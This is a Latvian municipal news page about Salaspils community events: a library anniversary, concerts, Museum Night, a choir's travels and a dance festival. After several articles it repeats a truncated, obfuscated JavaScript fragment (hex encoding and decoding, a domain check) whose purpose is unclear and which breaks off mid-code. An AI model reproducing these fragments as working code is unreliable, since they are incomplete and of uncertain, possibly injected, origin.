Šī mājaslapa izmanto dažādas sīkdatnes. Dažas sīkdatnes ir funkcionāli nepieciešamas, bez kurām Jūs nevarēsiet lietot šo mājaslapu. Bet pārējās sīkdatnes tiks izmantotas tikai tad, ja Jūs tam piekrītat. Uzzināt vairāk

Gadu šūpolēs

 Laika neapturamās straumes atspulgā šogad Salaspils novada bibliotēkas 70 gadi. Atskatoties paveras plūdums, kas nav bijis rāms un vienlīdz līgans. Posmiem akmeņains un krāčains, citviet veldzējoši kluss un mierpilns, tā šūpās veidojusies tradīcijām un allaž jaunām iecerēm un aktivitātēm bagāta kultūras, izglītības un sociālās komunikācijas telpa. Maijā, kad Salaspilī tradicionāli svin Novada svētkus, bibliotēka savu nozīmīgo gadskārtu atzīmē pasākumu ciklā kopā ar draugiem un atbalstītājiem, lasītājiem, sadarbības partneriem, bijušajiem darbiniekiem un citu bibliotēku kolēģiem. 18.maijā novadpētniecības starpnozaru semināru „Jaunie, radošie salaspilieši – Latvijas zinātnei un sabiedrībai” (veltītu bibliotēkas jubilejai) apmeklēja vairāk kā 50 Pierīgas reģiona bibliotēku pārstāvji un bibliotēkas draugi. Ar mērķi iepazīt bibliotēka pirmoreiz kopā bija pulcējusi aktīvos, radošos salaspiliešus. Salaspils novada bibliotēkas vēstures lappusēs klātesošajiem ielūkoties ļāva Mg.sc.soc. Anda Priedīte, kuras viens no uzdevumiem ikdienā ir papildināt un apkopot analītisko informāciju Pierīgas novadu bibliotēku kopkatalogā. Ar kodolīgu, interesantām faktu niansēm piepildītu lasījumu par A.Upīša privāto grāmatu kolekciju auditoriju aizrāva filoloģijas maģistrs, A.Upīša personības un daiļrades pētnieks Arnis Koroševskis. Grāmatas „Padomju Latvija 1918-1919” autors, Dr.hist. Jānis Šiliņš sniedza ziņojumu par sarežģītu laika nogriezni Latvijas vēsturē: no 1939.gada nogales līdz 1940.gada augustam un Armijas 22.darbnīcas darbību Salaspilī. Savukārt LU Vēstures un filozofijas fakultātes docents, grāmatas „Atmiņu Daugava” līdzautors Dr.hist. Mārtiņš Mintaurs auditoriju veda pa novada vēstures pētīšanas ceļiem, akcentējot novadpētniecības būtību, nozīmi un bibliotēkas funkcijas novada vēstures izzināšanā un publicētās informācijas apzināšanā un saglabāšanā. Izpētījusi zirgu krāsas, to apzīmējumus latviešu valodā un apkopotās ziņas publicējusi grāmatā „Zirga pase”, par savu lielāko aizraušanos – zirgiem semināra turpinājumā stāstīja LU Baltu filoloģijas maģistrante Inese Tone. Izskaņā dolēniete, LU Sociālo zinātņu fakultātes docente Dr.sc.comm. Aiga Grēniņa, īsu brīdi kavējusies atmiņās par pirmajām sajūtām bibliotēkas lasītājas lomā vēl bērnībā, pievērsās raitam, koncentrētam stāstījumam par lasīšanas tendencēm un bibliotēkas izaicinājumiem mūsdienās. Par katru no jaunajiem, radošajiem pētniekiem - ekspertiem savā jomā - runā viņu darbi, aizrautība, mērķtiecība, līdz šim sasniegtais un seminārā izskanējusī atzīšanās (apziņa), ka nezināmā un apgūstamā vēl ir daudz. Kā ieskatu jauno pētnieku darba laukā un paveiktajā bibliotēkā ir iespēja aplūkot zinātnisko publikāciju un grāmatu izstādi, kas atvērta līdz 22.jūnijam. Bibliotekāri ar patiesu gandarījumu par izdevušos tikšanos pateicas jaunajiem pētniekiem par atsaucību un dalību seminārā ar interesantiem, aizraujošiem referātiem, vēlot labvēlīgus „laikapstākļus” viņu profesionālajā izaugsmē, īstenojot ieceres un nākotnes plānus. Sanākušo prieks par bibliotēkā (bibliotēkas kolektīva) realizēto zinātnisko, izglītojoši bagātinošo tikšanos, ļauj apgalvot, ka turpmāk tā kļūs par tradīciju, kas sabiedrībai būs iespēja tuvplānā iepazīt jaunos novadniekus, kuri „veicina vārīšanos” un joprojām apliecina, ka Salaspils ir zinātnes un zinātnieku pilsēta. Pēc nedēļas- 25.maijā saules un saviļņojošu emociju karsētā gaisotnē laiks sarīkojumam k/n “Rīgava”. Tur bibliotēkas draugi, Goda salaspilieši, sadarbības partneri un citu bibliotēku kolēģi, bijušie darbinieki, čaklākie lasītāji un dāsnākie grāmatu dāvinātāji bija aicināti būt kopā svētkos. Mazajā zālē saviem viesiem bibliotekāri bija sarūpējuši fotoizstādi „Mēs esam”, atklājot savas brīvā laika pavadīšanas nodarbes un bērnības vaibstus. Izstāde aplūkojama bibliotēkas abonementā līdz 22.jūnijam. Pēcpusdiena iesākās ar svinīgu, literāri muzikālu stāstu, kurā savīti Salaspils bibliotēkas vēstures liecības, lasītāju raksturojums un paražas, pakalpojumu un tradīciju kopsavilkums un bibliotēkas kolektīva atspulgs gadu gaitā. Kultūras nama lielās zāles mājīgi iekārtotajā lasīšanas stūrītī skanēja Rainis, A.Eglītis, I.Ziedonis, K.Skujenieks, N.Ikstena. Daiļdarbu fragmenti mijās ar mūziķa un komponista Goran Goras izpildītajiem skaņdarbiem, kuru teksti un ritms aizskāra dvēseles stīgas un domām lika sekot meditatīvajam pavedienam. Bibliotēkas direktore Daiga Orbidāne pateicās sadarbības partneriem, bijušajiem darbiniekiem, īpaši atzīmējot ilggadējo darbinieku ieguldījumu, kā arī kolektīvam, kas kopā ar viņu ir šobrīd. Lasītavas vadītāja Maruta Birzniece, sistēmbibliotekāre Inita Vilcāne un bibliotēkas direktore Daiga Orbidāne saņēma Kultūras ministrijas atzinības rakstu, bet Bērnu un jauniešu apkalpošanas nodaļas vadītāja Inita Siņica un Dienvidu filiālbibliotēkas vadītāja Dace Mosāne – pateicības rakstu. Tos pasniedza KM Bibliotēku un arhīvu nodaļas vadītājs Jānis Turlajs un vecākā referente Linda Langenfelde. Svinīgajai daļai tuvojoties izskaņai, rindā kārtojās sveicēji. Vāzes ar ūdeni uz skatuves trepītēm gaidīja savu piepildījumu. Vēlējumu kamolītis ritēja raiti, dzīpars veidojās spilgts un krāsains. Tajā labos vārdus sēja Salaspils novada domes priekšsēdētājs Raimonds Čudars, kurš bibliotēkas kolektīvam dāvāja divas simboliskas veltes, kas turpmāk radīs vietu bibliotēkas novadpētniecības lasītavā un daiļliteratūras plauktā. Viena no tām - vēsturiska fotogrāfija, kurā trīs vīri laivā uz Daugavas pie Salaspils ap 1912.gadu. Tā nu jau kļuvusi par Salaspils zīmolu. Priekšsēdētāja otra dāvana bija pārizdots Umberto Eko romāns „Rozes vārds”. Savs vārds bija sakāms arī Salaspils pašvaldības iestāžu pārstāvjiem. Sveicēju pulkā arī LNB Attīstības departamenta direktors, divu meitu tētis salaspilietis Uldis Zariņš, kurš apmeklē Dienvidu filiālbibliotēku. Viņš atveda sveicienu arī no Latvijas Bibliotekāru biedrības un priekšsēdētājas Kristīnes Pabērzas, kura apsveikumā ierakstījusi Henrija Nouvena atziņu: „Tikai devīgi sniegdami no mūsu zināšanu akas, atklājam, cik dziļa tā ir.” Tālāk sekoja Bibliotēku informācijas sistēmas ALISE pārstāves Sarmītes Pogules, reģionu galveno bibliotēku direktoru, Pierīgas reģiona bibliotēku Konsultatīvās padomes locekļu apsveikumi. Visbeidzot – pateicību bibliotekāriem par darbu izteica lasītāji un direktore saņēma ziedus no bijušajiem darbiniekiem. Ziedi ceļoja no sveicēju rokām veldzēties vāzēs, labie vārdi un vēlējumi sasniedza bibliotēkas kolektīva sirdis, raisot smaidu un prieka asaras. Sarīkojums, saules un liega vēja lutināts, turpinājās Rīgavas dārzā, kur viesu un bibliotēkas darbinieku emocionālo pasauli ar latviešu klasiķu dzeju mūzikā piepildīja dienas gaitā uzticīgais mākslinieks Goran Gora un viņa domu biedru duets. „Godkārības gredzens pirkstā spīgo. Tas ir jānovelk un jānosviež. Izģērb savu sirdi nemierīgo, Nomet visu, kas tai plecus spiež!”. Tā vienā no koncerta dziesmām „Labā sirds” ar Imanta Ziedoņa vārdiem aicināja mūziķi. Salaspils novada bibliotēkas direktore un kolektīvs saka paldies atsaucīgajam k/n “Rīgava” kolektīvam, īpaši kultūras pasākumu organizatorei Agnesei Reķei un skaņu pults pogu pavēlniekam Kasparam Ruciņam par sadarbību sarīkojuma tapšanā un sekmīgā norisē. Tāpat pateicība fondam „Viegli” un mūziķim Goran Gora ar lielisko domubiedru komandu par sirsnīgo attieksmi un sajūtās silto atmosfēru visas dienas garumā. Paldies par operatīvu un profesionālu klātbūtni aiz fotokameras mūsu IT ekspertam Andrim Jansonam, A/S „Roga-Agro” par svētku torti un saimniecei Ingunai ar komandu par sadarbību. Atskaites punkts laikā atzīmēts, tāpat kā ieskicēts kārtējais drosmīgais projekts – bibliotēkas garīgā atbalsta, novadnieka, dzejnieka un tulkotāja Knuta Skujenieka daiļrades digitālās kolekcijas izveide. Tikpat svarīga kā bibliotēkas saturs un pakalpojums, ir telpa, kurā dot un saņemt, sākot jau ar apkārtni. Iepriekšējā gadā aizsākta un šogad turpināsies sadarbība ar ainavu arhitekti Daigu Veinbergu, lai sakārtotu bibliotēkas ārtelpu. Ilze Zariņa, bibliotekāre   // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salaspils.lv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

lasīt vairāk
Svētkos arī “Stuntfighters” šovs

28. maijā pulksten 16.30 pie stadiona notiks “Stuntfighters” šovs. „Stuntfighters” komanda ir streetbike freestyle pamatlicēji Latvijā ar 11 gadu pieredzi. Pēdējos trīs gadus piedāvā pasaulē labāko streetbike freestyle tandēmu šovu, kurā piedalās divi motociklisti un divas moto akrobātes. Paši būvē jaudīgus kvadraciklus, motociklus kūleņu griešanai un uguns cilpas. Šogad Salaspilī komandai būs sezonas atklāšana. Komandas līderis ir Jānis Rozītis. Kvadracikls, ar kuru Jānis brauks, ir viņa paša būvēts, tam par bāzi izmantojot Hondas CBR1000 RR motoru. Šovā piedalīsies arī Lauris Klēbahs. Pirms streetbike freestyle Lauris bija profesionāls moto triālists, kurš vairākkārt ir pārstāvējis Latviju nāciju kausa izcīņā pasaulē. Šogad startēs tandēmā ar sievu Sabini Klēbahu. Speciāli uzaicinātais arī viesis no Baltkrievijas - Ņikita Podolsky . Ņikita ir vislabākais Baltkrievijas braucējs un viens no labākajiem Krievijas un Ukrainas stantraideriem. Ņikita pasaules čempionātā ir ieguvis 13 vietu. un Austrumeiropā vairakkārt uzvarējis. Patreiz vada drošas braukšanas skolu Maskavā. 

lasīt vairāk
Mūzikas un mākslas skolas audzēkņi aicina uz noslēguma koncertu

Jau ik gadus, novada svētku nedēļā Salaspils Mūzikas un mākslas skolas audzēkņi savus vecākus, radus un draugus iepriecina ar noslēguma koncertu. Arī šis gads nav izņēmums, jo 26. maijā pulksten 18.00 uz skatuves kāps labākie jaunie mūziķi. Jūs dzirdēsiet gan klavieres, ģitāru, kokli, klarneti, vijoli, gan sitaminstrumentus un saksofonu. Koncertā izskanēs kā pasaules slavenu komponistu labākie skaņdarbi, tā arī tautasdziesmas. Uz tikšanos jau ceturtdien!   

lasīt vairāk
Taizē lūgšana- dziesma Salaspils luterāņu baznīcā

Šogad 14.maijā, tieši pirms Vasarsvētkiem Salaspils evaņģēliski luteriskajā draudzē notika nu jau otrais Tezē lūgšanu vakars. Tezē lūgšanas vakarā, piedaloties draudzes mācītājam Krišjānim Bullem, tika lasīti Svētie Raksti (Bībele), izdziedāti Dāvida psalmi, izdziedātas Tezē lūgšanas- dziesmas. Šo brīnišķīgo iespēju baudīt klusumu, mūziku un piedalīties Tezē lūgšanā mums noorganizēja Salaspils draudzes mūziķes: Vija Vanaga, Liene Blumere un Katrīna Tolpežņikova. Jūs jautāsiet, kas ir Tezē lūgšana? Tezē ir vieta Francijā, kur Tezē kopiena kalpo līdzcilvēkiem. Tās kopienas brāļi saka: “Mūsu kopienā ļoti svarīga ir mīlestības pilna labsirdība.” Tezē kopienas mierpilnā meditatīvā, klusā lūgšana ir veids, kā cilvēkiem rast iespēju piedzīvot garīgo atmošanos. Tezē lūgšanas patiesība ir izdziedamas dziesmas. Daudzi jau tās ir iepazinuši un dzied Eiropā. Tezē dziesmas ir iztulkotas vairākās valodās (angļu, vācu, itāļu, latviešu un vēl dauzās citās valodās). Tezē lūgšanas- dziesmas ir melodiskas, vienkāršas pēc savas būtības, vārdi tiek atkārtoti atkal un atkal, un tas palīdz apjaust vārdu būtisko nozīmi ticības dzīvē. Mūsu steidzīgajā nemiera pilnajā pasaulē, kurā mums ir tik daudz uzdevumu, pienākumu un rūpju, mums ar tiem visiem jātiek galā. Mēs esam noskrējušies, dažreiz neapmierināti, noguruši - tomēr negūstam apmierinājumu un mieru. Mums visiem ļoti nepieciešams piedzīvot patiesu mieru un klusumu, jo tikai tad mēs atkal varam celties un iet uz priekšu. Mums vajadzētu kaut uz īsu brīdi apstāties. Šīs dziesmas palīdz atpūsties no liekvārdības un piedzīvot patiesu mieru un brīvību. Šā gada nogalē (no 28.decembra līdz 1.janvārim ) Rīgā pulcēsies tūkstošiem cilvēku no dažādām Eiropas valstīm, lai vienotos kopīgās lūgšanās un dziesmās. Mūsu galvaspilsētā norisināsies Tezē kopienas Eiropas jauniešu tikšanās. Tas būs iespaidīgs un kristīgās ticību stiprinošs notikums. Dārgo lasītāj, par mums un mūsu gaidāmajām aktivitātēm, svētkiem, velobraucieniem, draudzes kino vakariem varat izlasīt draudzes mājaslapā www.salaspilsbaznica.lv. Uz tikšanos baltajā baznīcā ar zaļo jumtu! Andra Ozoliņa, Salaspils Mārtiņa Lutera evaņģēliski luteriskā draudze // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salaspils.lv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

lasīt vairāk
Muzeju naktī pulcējas vairāk kā 1000 apmeklētāji

Salaspils novada svētku ietvaros sestdien, 21.maijā Daugavas muzejs apmeklētājiem piedāvāja muzeju nakts pasākumu „Aiz durvīm kā lakstīgala sirds mana dzied”. Muzejā viesojās 1152 apmeklētāji, lai Latvijas Kultūras koledžas studentu virsvadībā izzinātu, kas slēpjas aiz Daugavas muzeja daudzajām durvīm. Apmeklētājus aicināja iepazīt un pašiem izmēģināt dažādus mākslas veidus un atrisināt uzdevumu. Ar savām koncertprogrammām apmeklētājus priecēja Latvijas Kultūras akadēmijas studenti, Latvijas Kultūras koledžas studenti, Arnis Miltiņš un viņa draugi. Un visa pasākuma garumā bija iespēja iepazīties ar Daugavas muzeja topošo ekspozīciju. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salaspils.lv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

lasīt vairāk
Novada svētku ietvaros - "Īsa pamācība mīlēšanā"

SALASPILS NOVADA SVĒTKU IETVAROS 23. maijā plkst. 19.30 Rīgavas Mūzikas un mākslas dārzā, Līvzemes ielā 7 dziesmu spēle pēc Rūdolfa Blaumaņa stāstu motīviem"ĪSA PAMĀCĪBA MĪLĒŠANĀ" Piedalās : Aija Dzērve, Sarmīte Rubule, Evija Skulte, Aīda Ozoliņa, Zane Jančevska, Ivars Kļavinskis, Kristiāns Karēļins, Juris Kalniņš, Voldemārs Šoriņš, Andris Daņiļenko, Valdis Zilverisun Salaspils k.n. "Rīgava" JDK "ŪSIŅŠ"Kolektīva vadītāji Mārtiņš Pēdājs un Marga Apsīte Viļņu Jānim pienācis laiks ņemt sievu, bet kā lai atrod vislabāko? Jānis izliekas, ka palicis kurls, klausīdamies zvanu baznīcas tornī, un apbraukā apkārtnes mājas, dzirdēdams arī to, kas viņam nemaz nebūtu jādzird. Tikai kalēja māsa Ilze uztraucas, kā nabaga slimnieku varētu izārstēt. Biļetes 3 EUR "Biļešu Paradīzē" un kultūras nama kasē Lietus gadījumā izrāde notiks kultūras namā!

lasīt vairāk
Salaspils svētku ietvaros - „Dienvidu Mierā“

28.maijā aicinām novada iedzīvotājus svētkus ieskandināt arī Zinātņu akadēmijas ciematā, Miera ielā 25a (bijušā veikala Kriksītis teritorijā). 11:00 – 14:00 aicinām uz pirmo Salaspils Andeli – savu lietoto, bet izcilo lietu apmaiņai, andelei pret sev tīkamām mantām, rotām, rotaļlietām, pašdarinājumiem u.c. 15:00- 17:00 konkurss-degustācija “Cep, cep kūku!”, aicināts piedalīties ikviens, kuram patīk gatavot. Kūkas izejmateriāli, garšu salikumi, izskats- brīva meistaru fantāzija, arī gatavotāju vecumam ierobežojuma nav, vienīgais noteikums - kūkai jābūt pašgatavotai. Kā nopietnā konkursā kūkas vērtēs kompetenta žūrija, būs tituli un vērtīgas balvas. Sava izcilā, skaistā, vislabākā kūka tiek gatavota mājās, bet ar veikumu leposimies pasākuma ietvaros. Lieliska iespēja mājās gatavotājiem sevi pareklamēt. 15:00- 17:00 radošās darbnīcas visiem, kam ir vēlme izpausties radoši, vēl nav izauguši līdz cepeškrāns pogām vai vienkārši nepadodas gatavot. Kūku konkursam un labo lietu apmaiņai – andelei aicinām iepriekš pieteikties pa e-pastu

lasīt vairāk
„Lōja” airē ciemos un mājās

Kā jau vienmēr, arī šogad koris „Lōja” aktīvi koncertē un priecē klausītājus ar saviem priekšnesumiem lielākos un mazākos pasākumos daudzviet Latvijā un ārzemēs. Gadu sākuši ar tradicionālo Zvaigznes dienas koncertu Ikšķiles baznīcā, ātri vien pārslēdzāmies uz mūsu nozīmīgāko projektu – dalību pasaulslavenā koru konkursā Itālijā, Gardas ezera piekrastes brīnišķajā pērlē Riva del Garda. To sākām plānot jau pērnvasar, kad mums pievienojās mūsu jaunais kolēģis – diriģents Krišs Pozemkovskis, kura iniciatīvai arī varam pateikties par ierosmi doties uz šo konkursu. Gatavoties sākām jau no oktobra, kad saņēmām rīkotāju apstiprinājumu, ka esam izturējuši atlases kārtu un tiekam uzaicināti piedalīties šajā konkursā. Lai godam pārstāvētu Latviju un Salaspili šajā starptautiskajā forumā, rūpīgi izvēlējāmies repertuāru, iekļaujot tajā gan lībiešu, gan latviešu, gan arī pasaules kora mūzikas atraktīvākos darbus. Jo katrs konkurss, katra uzstāšanās vispirms ir tikšanās ar klausītāju, kurš jāpārsteidz un jāiejūsmina. Un katrs konkurss, īpaši starptautisks, ir arī lieliska motivācija gan kora kopējā, gan katra korista personīgajā izaugsmē. Kora ceļojums nav vienkāršs tūrisma brauciens, tas ir arī liels un rūpīgs finanšu un maršruta plānošanas darbs, tādēļ mums ir liels prieks, ka mūs (projektu konkursa ietvaros) atbalstīja Salaspils novada pašvaldība, kultūras nams „Enerģētiķis”, turpina atbalstīt mūsu draugi SIA ”INOS”, „Attēls R”, „Strabag”. Īpaši liela pateicība pienākas pašiem koristiem un biedrībai „Koris Lōja”, kuru finansiālais un organizatoriskais ieguldījums ir neatsverams! Kārtīgi gatavojušies, kārtīgi arī nostartējām – mums ir lepnums par milzīgā konkurencē iegūto „Sudraba Diplomu”. Lepnums, ka tikām izvēlēti uzstāties pat atklāšanas koncertā. Tomēr desmit intensīvi piepildītu kopā būšanas dienu un pieveiktu 4500 km lielākais ieguvums (pat neraugoties uz pēkšņām un sen aizmirstām robežkontrolēm Austrijā) ir Vīnes atmosfēra turpceļā, brīnišķīgie dabas skati pie Gardas ezera un augstu Itālijas Dolomītu Alpu kalnos, dzīve Prāgas vecpilsētas centrā atpakaļceļā, jauniegūtie draugi, rātni un nerātni piedzīvojumi, koncertos saņemtā klausītāju atsaucība un nelielas skumjas pēc mājās palikušajiem. Jo mūsu gudrie tālruņi nenogurstoši vēstīja mums par Salaspilī esošajām dabas kataklizmām un salu, kas ļoti kontrastēja ar mums apkārt esošo vasaru. Gribējām aizsūtīt uz mājām kaut daļiņu no tā siltuma un saules, ko izdevās baudīt mums. Kaut ar sociālo tīklu palīdzību. Pēc piedzīvojumiem un iespaidiem bagātā ceļojuma, ne brīdi neatslābstot, devāmies uz koru konkursu „Zem Māras zīmes” Dobelē, kur piedalījāmies pat divās kategorijās. It īpašu atsaucību klausītāju un žūrijas vidū izpelnījās mūsu uzstāšanās tautas dziesmu un apdaru kategorijā, kur žūrijas piešķirto punktu izteiksmē tikai nedaudz pietrūka līdz uzvarai. Tātad ir vēl kur tiekties. Un mēs to varam. Savu konkursos iegūto pieredzi koris lika lietā ikgadējā Ogres koru apriņķa skatē 7.maijā, kur izpelnījās līdz šim nebijuši augstu novērtējumu un jau kārtējo pirmās pakāpes atzinību. Noslēdzot koru skates pirmo daļu, izpildījām mūsu iemīļoto un visu Latvijas koru repertuārā „ieviesto” Raimonda Tigula „Lec, saulīte”, kur mums pievienojās dūdinieks Māris Jēkabsons. Gan koristiem, gan skates žūrijai, gan klausītājiem tas bija īpašs emocionāls pārdzīvojums, ko atcerēsimies vēl ilgi un ar prieku. Ilgi svinēt šo panākumu šoreiz gan nebija laika, jo jau nākamajā rītā ar dziesmām kuplinājām Latvijas valstsvīru un ārvalstu diplomātiskā korpusa pārstāvju vizīti piemiņas brīdī Salaspils memoriālā. Īpaša pateicība skolotājām Lāsmai Streiķei un Rūtai Bugavičūtei par brīnišķīgi organizētu Salaspils skolēnu iesaisti dziedāšanā. Pirms pievērsties „Lōjas” tradicionālajiem vasaras notikumiem – ielīgošanai un aplīgošanām dažādās Latvijas vietās, Kurzemes dziesmu svētkiem Kuldīgā 2.jūlijā, tradicionālajai kora nometnei Mazirbē un dalībai Līvu svētkos un citos notikumos- vēlamies nosvinēt arī Salaspils novada svētkus. Šobrīd aktīvi gatavojamies savam ikgadējam koncertam Salaspils katoļu baznīcā, un šoreiz koncerts būs īpašs, vairāk sajūtas un noskaņas rosinošs. „De profundis” – no dzīlēm. Šie 130.psalma vārdi ir pasaulslavenā igauņu komponista Arvo Pērta izcilā skaņdarba vīru korim, perkusijām un ērģelēm nosaukums. Varēs dzirdēt un izjust izcilās ērģelnieces Aijas Ziņģītes radītās skaņu vibrācijas, sitaminstrumentālista Valtera Līča meistarību un kora neatkārtojamo skanējumu. Koncerta īpašie viesi – vokālā džeza grupa „Assembly Singers” Eināra Verro vadībā iekrāsos sajūtas citos toņos, iejusties atmosfērā palīdzēs Jāņa Prinča „Jūrnieku svētās dziesmas un lūgšanas” un aktrise Terēze Lasmane. Gaidīsim Jūs uz tikšanos svētdien, 29.maijā pulksten 17.00 Salaspils katoļu baznīcā koncertā „De profundis”! Gatavojoties Latvijas simtgades Dziesmu svētkiem un veidojot jaunus projektus „Lōjas” dzīvē, aicinām korim pievienoties jaunus dalībniekus, lai dziedātu latviski, lībiski, angliski, vāciski, latīniski un visās citās valodās un nevalodās. Lai mācītos senus amatus. Lai būtu kopā ar draugiem gan tradicionālos, gan mežonīgos pasākumos, lai brauktu jūrā un sēņotu mežā. Lai kopīgi vārītu, ceptu un ēstu. Lai svinētu dabu. Lai mācītu to arī citiem. Lai turētu rūpi par savu novadu un valsti, lai lepotos par Latviju! Ģirts Gailītis, Salaspils kora „Lōja” diriģents

lasīt vairāk
Aicinām uz Muzeju nakts pasākumiem Doles salā

21. maijā Muzeju nakts Daugavas muzejā „AIZ DURVĪM KĀ LAKSTĪGALA SIRDS MANA DZIED” Informācija par pasākuma norisi: Norises laiks (19.00-01.00) Aktivitāte 19.00 – 19.15 Muzeja parkā, sagaidot Nakts viesus, rosās Vinnijs Pūks un viņa draugi. 19.15 – 19.45 Muzeju nakts atklāšana, LKK (Latvijas Kultūras koledžas) studentu atraktīvas improvizācijas par Vinnija Pūka un viņa draugu vēlēšanos izzināt, kas slēpjas aiz Daugavas muzeja daudzajām durvīm. 19.45 – 21.30 Iepazīšanās ar pārsteigumiem parka teritorijā- orientēšanās. Vinnija Pūka un viņa draugu meistarklases (spēles, dziesmas, mīklas, asprātīgie uzdevumi). 21.30 – 22.00 LKA (Latvijas Kultūras akadēmijas) un LKK (Latvijas Kultūras koledžas) studentu koncertprogramma „ Aiz durvīm.” 22.00 – 23.30 Arņa Miltiņa muzikāla programma - „Kā lakstīgala sirds man dzied!” 23.30 – 01.00 Iepazīšanās ar Daugavas muzeja topošo ekspozīciju.  

lasīt vairāk
“Piļu sadancošanās” šogad notiks Daugavpilī

Šogad “Danči pilī” notiks Daugavpils cietoksnī, Marka Rotko mākslas centra pagalmā 21. maijā pulksten 18 Muzeju nakts zīmē. Uz deju koncertu pulcēsies sešu pilsētu vidējās paaudzes tautas deju kolektīvi. Vidējās paaudzes deju kolektīvu sadraudzības projekts “Danči pilī” kopā pulcē dejotājus tikai no tām Latvijas pilsētām, novadiem vai pagastu centriem un apdzīvotajām vietām, kuru nosaukumā ir vārda daļa “pils”: Salaspils, Jaunpils, Jēkabpils, Daugavpils, Mālpils, Valdemārpils. Šāda ideja radusies salaspiliešiem, kuri pirms vairāk nekā 20 gadiem jau ieviesa konkursu "Salaspils kauss", savukārt 2014. gadā Salaspils kultūras nama “Rīgava” vidējās paaudzes deju kolektīvam “Ūsa” radās doma par visu Latvijas “piļu” tautas dejotāju kopīgu sadancošanu. NOLIKUMS // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "salaspils.lv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

lasīt vairāk

Salaspils

°C
Gaisa spiediens: hPa
Vēja stiprums: m/s
Vēja virziens:
tukšītis

Arhīvs